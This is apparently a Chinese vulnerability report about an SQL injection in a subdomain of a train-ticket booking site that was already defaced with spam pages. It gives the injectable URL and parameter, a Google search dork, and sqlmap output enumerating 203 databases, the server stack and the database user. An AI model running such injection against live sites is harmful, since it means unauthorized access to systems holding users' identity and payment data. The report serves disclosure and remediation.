春运买票回家,买完之后顺手搜索了一下这个域名震惊了~某子域名被入侵,挂满了限制关键词网站。(顺手黑了,提供sql注入漏洞一枚)
另外,买票域名包含很多用户身份、支付等信息,请彻查系统安全,保障用户信息安全!
谷歌一把,可发现入侵历史,挂满了限制关键词网站信息。
site:traffic.96900.com.cn
附带:
找了这个url
traffic.96900.com.cn/home/column.aspx?aid=109
sqlmap一把,一共203个db
[16:35:42] [INFO] testing MySQL
[16:35:42] [INFO] confirming MySQL
[16:35:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[16:35:42] [INFO] fetching database names
[16:35:42] [INFO] fetching number of databases
[16:35:42] [INFO] resumed: 203
[16:35:42] [INFO] retrieving the length of query output
[16:35:42] [INFO] retrieved: 18
....
[16:42:24] [INFO] retrieved: www_360dksspk_pw
[16:42:24] [INFO] retrieving the length of query output
[16:42:24] [INFO] retrieved: 14
[16:44:17] [INFO] retrieved: www_360dzpk_pw
[16:44:17] [INFO] retrieving the length of query output
[16:44:17] [INFO] retrieved: 12
[16:45:59] [INFO] retrieved: www_456qp_pw
[16:45:59] [INFO] retrieving the length of query output
...
[17:15:18] [INFO] retrieved: www_ambcy_pw
[17:15:18] [INFO] retrieving the length of query output
[17:15:18] [INFO] retrieved: 15
[17:16:23] [INFO] retrieved: www_ambcyxgs_pw
[17:16:23] [INFO] retrieving the length of query output
[17:16:23] [INFO] retrieved: 13
[17:17:36] [INFO] retrieved: www_ambczx_pw
[17:17:36] [INFO] retrieving the length of query output
[17:17:36] [INFO] retrieved: 14
[17:19:06] [INFO] retrieved: www_ambjldl_pw
[17:19:06] [INFO] retrieving the length of query output
....
mysql 用户
[17:22:20] [INFO] fetching current user
[17:22:20] [INFO] retrieving the length of query output
[17:22:20] [INFO] resumed: 24
[17:22:20] [INFO] resumed: mysql_web_user@localhost
current user: 'mysql_web_user@localhost'
漏洞证明:
谷歌一把,可发现入侵历史,挂满了限制关键词网站信息。
site:traffic.96900.com.cn
修复方案:
全面检查